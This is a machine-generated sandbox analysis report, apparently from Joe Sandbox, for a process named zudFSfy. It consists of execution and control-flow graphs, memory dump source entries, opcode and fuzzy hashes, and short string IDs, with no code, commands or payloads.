                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DD05E76F8A200FAC6000AA4B8643F9B378DB87012F042062994AA3126E328E0349514

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:9.7%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:31
                                                                                                                                                                                                                                          Total number of Limit Nodes:2
                                                                                                                                                                                                                                          execution_graph 36599 31d20c8 36600 31d20dc 36599->36600 36603 31d5a8d 36599->36603 36607 31d3015 36599->36607 36610 31d9f00 36603->36610 36605 31d5aae 36605->36600 36609 31d9f00 VirtualProtect 36607->36609 36608 31d3034 36609->36608 36612 31d9f13 36610->36612 36614 31d9fb0 36612->36614 36615 31d9ff8 VirtualProtect 36614->36615 36617 31d3ee2 36615->36617 36617->36603 36617->36605 36618 5ae92cb 36620 5ae92a2 36618->36620 36619 5ae93be 36620->36619 36623 5ad3b20 36620->36623 36626 5ad3b10 36620->36626 36624 5ad3b2d 36623->36624 36630 5ad4adb 36623->36630 36624->36620 36627 5ad3b20 36626->36627 36628 5ad3b2d 36627->36628 36629 5ad4adb 2 API calls 36627->36629 36628->36620 36629->36628 36634 5ad9c50 KiUserCallbackDispatcher 36630->36634 36636 5ad98b3 36630->36636 36631 5ad4ae4 36635 5ad9cb1 36634->36635 36635->36631 36637 5ad9c42 KiUserCallbackDispatcher 36636->36637 36639 5ad9cb1 36637->36639 36639->36631 36640 31da160 36641 31da1a0 CloseHandle 36640->36641 36643 31da1d1 36641->36643
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                          • API String ID: 0-312445597
                                                                                                                                                                                                                                          • Opcode ID: 06c3c0e515277444b33a532b4e255d614a050ab69c70f724e766a4f42679dba1
                                                                                                                                                                                                                                          • Instruction ID: f2d885879a22f96f84c3a973c96710fd1966a1c628ae24274a284bb31f1bc4be
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06c3c0e515277444b33a532b4e255d614a050ab69c70f724e766a4f42679dba1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DB2F534A00218CFDB14CFA8C994FADBBB6BF48700F158599E516AB3A5CB71AD85CF50
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                          • API String ID: 0-2546334966
                                                                                                                                                                                                                                          • Opcode ID: f4992236906dfc731980699bc98df8d71a965e08f00d0f66d9a5107cbbf86ed6
                                                                                                                                                                                                                                          • Instruction ID: 2377e7fee865b9ba9118b1d1b75486295002c395e1981fdc35eadd69f0f5240c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4992236906dfc731980699bc98df8d71a965e08f00d0f66d9a5107cbbf86ed6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F22D734A04218CFDB24CF64C994FADBBB6BF48704F1481E9E51AAB2A5DB719D81CF50
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499654332.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ae0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d768f92b70bf759873a8788d838d734d2bfae86f0e06bc4f5ec806af6eee118c
                                                                                                                                                                                                                                          • Instruction ID: 1453bdfa9cd49b9a5a5b6ef7069e75ad998d0fd393380f83ec48af065e6e22cb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d768f92b70bf759873a8788d838d734d2bfae86f0e06bc4f5ec806af6eee118c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1917870A04205DFEB14CF5AE585FBAB7F3FB89310F188169D406AB694DB789882CB54
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499654332.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ae0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0a4de5dff7df077c499b71b3b145d4349dace934b88aaceee6fef0d4aecf9277
                                                                                                                                                                                                                                          • Instruction ID: 861f4d2c30dc9c393a01687cdd8f620d1fe9abaa43041325b058b1250e6a9053
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a4de5dff7df077c499b71b3b145d4349dace934b88aaceee6fef0d4aecf9277
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03516470A00209DFCB44DFA9D854AAEBBF6FF8C304F4195ADD026AB290DB395945CF01
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499654332.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ae0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a1944aeedb48030d2c43b72cac7ca028bc2d6ce695588ad0c446996cd5473cdc
                                                                                                                                                                                                                                          • Instruction ID: 2e055aec0ed3a1aeb97a8df5c819be64bc90a732a3f2319fbd0aa9f1405f35d5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1944aeedb48030d2c43b72cac7ca028bc2d6ce695588ad0c446996cd5473cdc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51517570A00209DFCF44DFA9D454AAEBBF6FF8D304F4191A9D026AB290DB395985CF15

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 636 5ac9208-5ac9254 640 5ac925a-5ac926c 636->640 641 5ac93d2-5ac943e 636->641 644 5ac92bc-5ac9305 640->644 645 5ac926e-5ac92ba 640->645 653 5ac968d-5ac9694 641->653 654 5ac9444-5ac944d 641->654 673 5ac9308-5ac931c 644->673 645->673 657 5ac944f-5ac9453 654->657 658 5ac94c3-5ac94dc 654->658 661 5ac946c-5ac9478 657->661 662 5ac9455-5ac946a 657->662 670 5ac9609-5ac9619 658->670 671 5ac94e2 658->671 663 5ac9481-5ac94be 661->663 662->663 663->653 679 5ac961b-5ac9630 670->679 680 5ac9632-5ac963e 670->680 674 5ac94e9-5ac952c 671->674 675 5ac9579-5ac95bc 671->675 676 5ac9531-5ac9574 671->676 677 5ac95c1-5ac9604 671->677 681 5ac9327-5ac9348 673->681 674->653 675->653 676->653 677->653 686 5ac9647-5ac9688 679->686 680->686 691 5ac934a-5ac9350 681->691 692 5ac9352-5ac935c 681->692 686->653 693 5ac935f-5ac93a2 691->693 692->693 700 5ac93c8-5ac93cf 693->700 701 5ac93a4-5ac93c0 693->701 701->700
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                                                                                                                                                                                                                          • API String ID: 0-723292480
                                                                                                                                                                                                                                          • Opcode ID: dea1fca761f64a32949424aa24750bc3d78c517107b934cb6b984e897c44e203
                                                                                                                                                                                                                                          • Instruction ID: 3c9a29c48185f349fc1b3eefe2dbbd6a75c638367420388764f752add1e53152
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dea1fca761f64a32949424aa24750bc3d78c517107b934cb6b984e897c44e203
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9D12C36A00214DFCB15CF54C954EAABBB6FF88310F0644E8E509AB275DB32ED56DB90

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 852 5ac7f40-5ac7f68 854 5ac7f6a-5ac7fb1 852->854 855 5ac7fb6-5ac7fc4 852->855 903 5ac840d-5ac8414 854->903 856 5ac7fc6-5ac7fd1 call 5ac4ec8 855->856 857 5ac7fd3 855->857 859 5ac7fd5-5ac7fdc 856->859 857->859 862 5ac80c5-5ac80c9 859->862 863 5ac7fe2-5ac7fe6 859->863 867 5ac811f-5ac8129 862->867 868 5ac80cb-5ac80da call 5ac3068 862->868 864 5ac7fec-5ac7ff0 863->864 865 5ac8415-5ac843d 863->865 870 5ac8002-5ac8060 call 5ac4c08 call 5ac5670 864->870 871 5ac7ff2-5ac7ffc 864->871 877 5ac8444-5ac846e 865->877 872 5ac812b-5ac813a call 5ac2878 867->872 873 5ac8162-5ac8188 867->873 880 5ac80de-5ac80e3 868->880 912 5ac8066-5ac80c0 870->912 913 5ac84d3-5ac84fd 870->913 871->870 871->877 889 5ac8476-5ac848c 872->889 890 5ac8140-5ac815d 872->890 898 5ac818a-5ac8193 873->898 899 5ac8195 873->899 877->889 885 5ac80dc 880->885 886 5ac80e5-5ac811a call 5ac7e10 880->886 885->880 886->903 915 5ac8494-5ac84cc 889->915 890->903 905 5ac8197-5ac81bf 898->905 899->905 917 5ac81c5-5ac81de 905->917 918 5ac8290-5ac8294 905->918 912->903 922 5ac84ff-5ac8505 913->922 923 5ac8507-5ac850d 913->923 915->913 917->918 943 5ac81e4-5ac81f3 call 5ac2810 917->943 924 5ac830e-5ac8318 918->924 925 5ac8296-5ac82af 918->925 922->923 926 5ac850e-5ac854b 922->926 928 5ac831a-5ac8324 924->928 929 5ac8375-5ac837e 924->929 925->924 947 5ac82b1-5ac82c0 call 5ac2810 925->947 944 5ac832a-5ac833c 928->944 945 5ac8326-5ac8328 928->945 932 5ac83b6-5ac8405 call 5ac8780 929->932 933 5ac8380-5ac83ae call 5ac4400 call 5ac4420 929->933 953 5ac840b 932->953 933->932 961 5ac820b-5ac8220 943->961 962 5ac81f5-5ac81fb 943->962 950 5ac833e-5ac8340 944->950 945->950 969 5ac82d8-5ac82e3 947->969 970 5ac82c2-5ac82c8 947->970 958 5ac836e-5ac8373 950->958 959 5ac8342-5ac8346 950->959 953->903 958->928 958->929 964 5ac8348-5ac8361 959->964 965 5ac8364-5ac8369 call 5ac1610 959->965 975 5ac8254-5ac825d 961->975 976 5ac8222-5ac824e call 5ac3550 961->976 971 5ac81fd 962->971 972 5ac81ff-5ac8201 962->972 964->965 965->958 969->913 981 5ac82e9-5ac830c 969->981 979 5ac82cc-5ac82ce 970->979 980 5ac82ca 970->980 971->961 972->961 975->913 978 5ac8263-5ac828a 975->978 976->915 976->975 978->918 978->943 979->969 980->969 981->924 981->947
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: Hbq$Hbq$Hbq
                                                                                                                                                                                                                                          • API String ID: 0-2297679979
                                                                                                                                                                                                                                          • Opcode ID: fb4832da20a8f1d3340f5a07baab744964915347cf30b00b7fd90147932f092b
                                                                                                                                                                                                                                          • Instruction ID: 8bc6cfbfb7046b9d30220ce5f5c29cdfaa415f3bd184a045ac444779a6bec602
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb4832da20a8f1d3340f5a07baab744964915347cf30b00b7fd90147932f092b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60124835B04205CFCB24DFA9C594AAEBBF2FF88300B1485ADE5569B394DB35AC46CB50

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 995 5ac9c00-5ac9c3d 997 5ac9c5f-5ac9c75 call 5ac9a08 995->997 998 5ac9c3f-5ac9c42 995->998 1004 5ac9feb-5ac9fff 997->1004 1005 5ac9c7b-5ac9c87 997->1005 1110 5ac9c44 call 5aca518 998->1110 1111 5ac9c44 call 5aca570 998->1111 1001 5ac9c4a-5ac9c4c 1001->997 1002 5ac9c4e-5ac9c56 1001->1002 1002->997 1012 5aca03f-5aca048 1004->1012 1006 5ac9c8d-5ac9c90 1005->1006 1007 5ac9db8-5ac9dbf 1005->1007 1009 5ac9c93-5ac9c9c 1006->1009 1010 5ac9eee-5ac9f28 call 5ac9410 1007->1010 1011 5ac9dc5-5ac9dce 1007->1011 1014 5aca0e0 1009->1014 1015 5ac9ca2-5ac9cb6 1009->1015 1108 5ac9f2b call 5acbae8 1010->1108 1109 5ac9f2b call 5acbaf8 1010->1109 1011->1010 1016 5ac9dd4-5ac9ee0 call 5ac9410 call 5ac99a0 call 5ac9410 1011->1016 1017 5aca00d-5aca016 1012->1017 1018 5aca04a-5aca051 1012->1018 1020 5aca0e5-5aca0e9 1014->1020 1032 5ac9cbc-5ac9d51 call 5ac9a08 * 2 call 5ac9410 call 5ac99a0 call 5ac9a48 call 5ac9af0 call 5ac9b58 1015->1032 1033 5ac9da8-5ac9db2 1015->1033 1106 5ac9eeb 1016->1106 1107 5ac9ee2 1016->1107 1017->1014 1027 5aca01c-5aca02e 1017->1027 1022 5aca09f-5aca0a6 1018->1022 1023 5aca053-5aca096 call 5ac9410 1018->1023 1024 5aca0eb 1020->1024 1025 5aca0f4 1020->1025 1028 5aca0a8-5aca0b8 1022->1028 1029 5aca0cb-5aca0de 1022->1029 1023->1022 1024->1025 1037 5aca0f5 1025->1037 1042 5aca03e 1027->1042 1043 5aca030-5aca035 1027->1043 1028->1029 1045 5aca0ba-5aca0c2 1028->1045 1029->1020 1087 5ac9d70-5ac9da3 call 5ac9b58 1032->1087 1088 5ac9d53-5ac9d6b call 5ac9af0 call 5ac9410 call 5ac96c0 1032->1088 1033->1007 1033->1009 1037->1037 1042->1012 1112 5aca038 call 5acc288 1043->1112 1113 5aca038 call 5acc298 1043->1113 1045->1029 1055 5ac9f31-5ac9fe2 call 5ac9410 1055->1004 1087->1033 1088->1087 1106->1010 1107->1106 1108->1055 1109->1055 1110->1001 1111->1001 1112->1042 1113->1042
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4'^q$4'^q$4'^q
                                                                                                                                                                                                                                          • API String ID: 0-1196845430
                                                                                                                                                                                                                                          • Opcode ID: 253fab386a54864ce6d1a95336dd029baa516915321a89d0300b1cf76b1662c4
                                                                                                                                                                                                                                          • Instruction ID: 728d624851b08f3a92d8bff215ff6002eb7df8405701b2e66af1d841ad85b9fc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 253fab386a54864ce6d1a95336dd029baa516915321a89d0300b1cf76b1662c4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDF19834B14118DFCB08DB64D998E9EBBB2FF89305F158198E506AB365DB71EC42CB50

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1114 5ace030-5ace050 1115 5ace169-5ace18e 1114->1115 1116 5ace056-5ace05a 1114->1116 1117 5ace195-5ace1ba 1115->1117 1116->1117 1118 5ace060-5ace069 1116->1118 1120 5ace1c1-5ace1f7 1117->1120 1119 5ace06f-5ace096 1118->1119 1118->1120 1130 5ace09c-5ace09e 1119->1130 1131 5ace15e-5ace168 1119->1131 1136 5ace1fe-5ace254 1120->1136 1133 5ace0bf-5ace0c1 1130->1133 1134 5ace0a0-5ace0a3 1130->1134 1138 5ace0c4-5ace0c8 1133->1138 1134->1136 1137 5ace0a9-5ace0b3 1134->1137 1153 5ace278-5ace28f 1136->1153 1154 5ace256-5ace26a 1136->1154 1137->1136 1139 5ace0b9-5ace0bd 1137->1139 1141 5ace129-5ace135 1138->1141 1142 5ace0ca-5ace0d9 1138->1142 1139->1133 1139->1138 1141->1136 1143 5ace13b-5ace158 call 5ac1640 1141->1143 1142->1136 1149 5ace0df-5ace126 call 5ac1640 1142->1149 1143->1130 1143->1131 1149->1141 1164 5ace37f-5ace38f 1153->1164 1165 5ace295-5ace37a call 5ac9a08 call 5ac9410 call 5acd5a0 call 5ac9410 call 5ac9a48 call 5acc960 call 5ac9410 call 5acbaf8 call 5aca2b0 1153->1165 1232 5ace26d call 5ace5b8 1154->1232 1233 5ace26d call 5ace5c8 1154->1233 1234 5ace26d call 5ace750 1154->1234 1235 5ace26d call 5ace8b0 1154->1235 1159 5ace273 1162 5ace4a1-5ace4ac 1159->1162 1174 5ace4ae-5ace4be 1162->1174 1175 5ace4db-5ace4fc call 5ac9b58 1162->1175 1172 5ace47c-5ace498 call 5ac9410 1164->1172 1173 5ace395-5ace46e call 5ac9a08 * 2 call 5aca1c0 call 5ac9410 call 5acd5a0 call 5ac9410 call 5ac96c0 call 5ac9b58 call 5ac9410 1164->1173 1165->1164 1172->1162 1229 5ace479 1173->1229 1230 5ace470 1173->1230 1185 5ace4ce-5ace4d6 call 5aca2b0 1174->1185 1186 5ace4c0-5ace4c6 1174->1186 1185->1175 1186->1185 1229->1172 1230->1229 1232->1159 1233->1159 1234->1159 1235->1159
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (bq$(bq$Hbq
                                                                                                                                                                                                                                          • API String ID: 0-2835675688
                                                                                                                                                                                                                                          • Opcode ID: a8c5ae21344c344142e6c3fdef781460b894a87848be7dc8a7c23095bfbdb8dd
                                                                                                                                                                                                                                          • Instruction ID: 7bfb5e953044716e2eea55403ba8b7fa45e6996ec3f4eaed64a52401a847bf40
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8c5ae21344c344142e6c3fdef781460b894a87848be7dc8a7c23095bfbdb8dd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5E10D34B01209DFCB05EF64D5949AEBBB6FF89310F1185A9E506AB364DB31EC42CB91
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2496530948.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5830000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4'^q$4'^q
                                                                                                                                                                                                                                          • API String ID: 0-2697143702
                                                                                                                                                                                                                                          • Opcode ID: 3491776f51786a076a845a5f4ad6c1a3b2e889b929ab3ed82364abd88f81d441
                                                                                                                                                                                                                                          • Instruction ID: 8ab30495c6e6554418c97313e575661bee8c0196e9478dbb6fb1eb3a58557660
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3491776f51786a076a845a5f4ad6c1a3b2e889b929ab3ed82364abd88f81d441
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97A2BC30F48328CFCF249A69555E63E69EBBB88A40B55496ADD07DB358EE30CC41C7D2

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1834 5ac38f9-5ac3934 1836 5ac393d-5ac3950 call 5ac3588 1834->1836 1837 5ac3936 1834->1837 1840 5ac3a94-5ac3a9b 1836->1840 1841 5ac3956-5ac3969 1836->1841 1837->1836 1842 5ac3d35-5ac3d3c 1840->1842 1843 5ac3aa1-5ac3aa7 1840->1843 1851 5ac396b-5ac3972 1841->1851 1852 5ac3977-5ac3991 1841->1852 1844 5ac3d3e-5ac3d47 1842->1844 1845 5ac3dab-5ac3db2 1842->1845 1847 5ac3ab0-5ac3ab6 1843->1847 1844->1845 1850 5ac3d49-5ac3d5c 1844->1850 1848 5ac3e4e-5ac3e55 1845->1848 1849 5ac3db8-5ac3dc1 1845->1849 1854 5ac3ab8-5ac3aba 1847->1854 1855 5ac3ad6-5ac3adc 1847->1855 1857 5ac3e57-5ac3e68 1848->1857 1858 5ac3e71-5ac3e77 1848->1858 1849->1848 1856 5ac3dc7-5ac3dda 1849->1856 1850->1845 1870 5ac3d5e-5ac3da3 call 5ac1040 1850->1870 1853 5ac3a8d 1851->1853 1873 5ac3998-5ac39a5 1852->1873 1874 5ac3993-5ac3996 1852->1874 1853->1840 1854->1855 1859 5ac3abc-5ac3ad3 1854->1859 1860 5ac3ba4-5ac3ba8 1855->1860 1861 5ac3ae2-5ac3ae4 1855->1861 1878 5ac3ddc-5ac3deb 1856->1878 1879 5ac3ded-5ac3df1 1856->1879 1857->1858 1880 5ac3e6a 1857->1880 1863 5ac3e89-5ac3e92 1858->1863 1864 5ac3e79-5ac3e7f 1858->1864 1859->1855 1860->1842 1866 5ac3bae-5ac3bb0 1860->1866 1861->1860 1869 5ac3aea-5ac3b6b call 5ac1040 * 4 1861->1869 1871 5ac3e95-5ac3f0a 1864->1871 1872 5ac3e81-5ac3e87 1864->1872 1866->1842 1876 5ac3bb6-5ac3bbf 1866->1876 1941 5ac3b6d-5ac3b7f call 5ac1040 1869->1941 1942 5ac3b82-5ac3ba1 call 5ac1040 1869->1942 1870->1845 1911 5ac3da5-5ac3da8 1870->1911 1950 5ac3f0c-5ac3f16 1871->1950 1951 5ac3f18 1871->1951 1872->1863 1872->1871 1875 5ac39a7-5ac39bb 1873->1875 1874->1875 1875->1853 1909 5ac39c1-5ac3a15 1875->1909 1882 5ac3d12-5ac3d18 1876->1882 1878->1879 1883 5ac3e11-5ac3e13 1879->1883 1884 5ac3df3-5ac3df5 1879->1884 1880->1858 1889 5ac3d1a-5ac3d29 1882->1889 1890 5ac3d2b 1882->1890 1883->1848 1888 5ac3e15-5ac3e1b 1883->1888 1884->1883 1893 5ac3df7-5ac3e0e 1884->1893 1888->1848 1895 5ac3e1d-5ac3e4b 1888->1895 1894 5ac3d2d-5ac3d2f 1889->1894 1890->1894 1893->1883 1894->1842 1901 5ac3bc4-5ac3bd2 call 5ac2810 1894->1901 1895->1848 1916 5ac3bea-5ac3c04 1901->1916 1917 5ac3bd4-5ac3bda 1901->1917 1947 5ac3a17-5ac3a19 1909->1947 1948 5ac3a23-5ac3a27 1909->1948 1911->1845 1916->1882 1926 5ac3c0a-5ac3c0e 1916->1926 1920 5ac3bdc 1917->1920 1921 5ac3bde-5ac3be0 1917->1921 1920->1916 1921->1916 1929 5ac3c2f 1926->1929 1930 5ac3c10-5ac3c19 1926->1930 1932 5ac3c32-5ac3c4c 1929->1932 1934 5ac3c1b-5ac3c1e 1930->1934 1935 5ac3c20-5ac3c23 1930->1935 1932->1882 1955 5ac3c52-5ac3cd3 call 5ac1040 * 4 1932->1955 1936 5ac3c2d 1934->1936 1935->1936 1936->1932 1941->1942 1942->1860 1947->1948 1948->1853 1954 5ac3a29-5ac3a41 1948->1954 1956 5ac3f1d-5ac3f1f 1950->1956 1951->1956 1954->1853 1962 5ac3a43-5ac3a4f 1954->1962 1982 5ac3cea-5ac3d10 call 5ac1040 1955->1982 1983 5ac3cd5-5ac3ce7 call 5ac1040 1955->1983 1957 5ac3f26-5ac3f2b 1956->1957 1958 5ac3f21-5ac3f24 1956->1958 1961 5ac3f31-5ac3f5e 1957->1961 1958->1961 1964 5ac3a5e-5ac3a64 1962->1964 1965 5ac3a51-5ac3a54 1962->1965 1967 5ac3a6c-5ac3a75 1964->1967 1968 5ac3a66-5ac3a69 1964->1968 1965->1964 1971 5ac3a84-5ac3a8a 1967->1971 1972 5ac3a77-5ac3a7a 1967->1972 1968->1967 1971->1853 1972->1971 1982->1842 1982->1882 1983->1982
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $^q$$^q
                                                                                                                                                                                                                                          • API String ID: 0-355816377
                                                                                                                                                                                                                                          • Opcode ID: f4ba60b020ae66ad8021572d66ee821344d605d42c97a9c1a5d3e2df80f2ca89
                                                                                                                                                                                                                                          • Instruction ID: e172d6fa28331b704a811f44d59e43c2b1f52e17a3c249f6f9891f25199fb6d9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4ba60b020ae66ad8021572d66ee821344d605d42c97a9c1a5d3e2df80f2ca89
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA124E34A04619CFCF15CFA5D954ABEBBB2FF48700F148499E812AB3A4DB399D45CB90

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
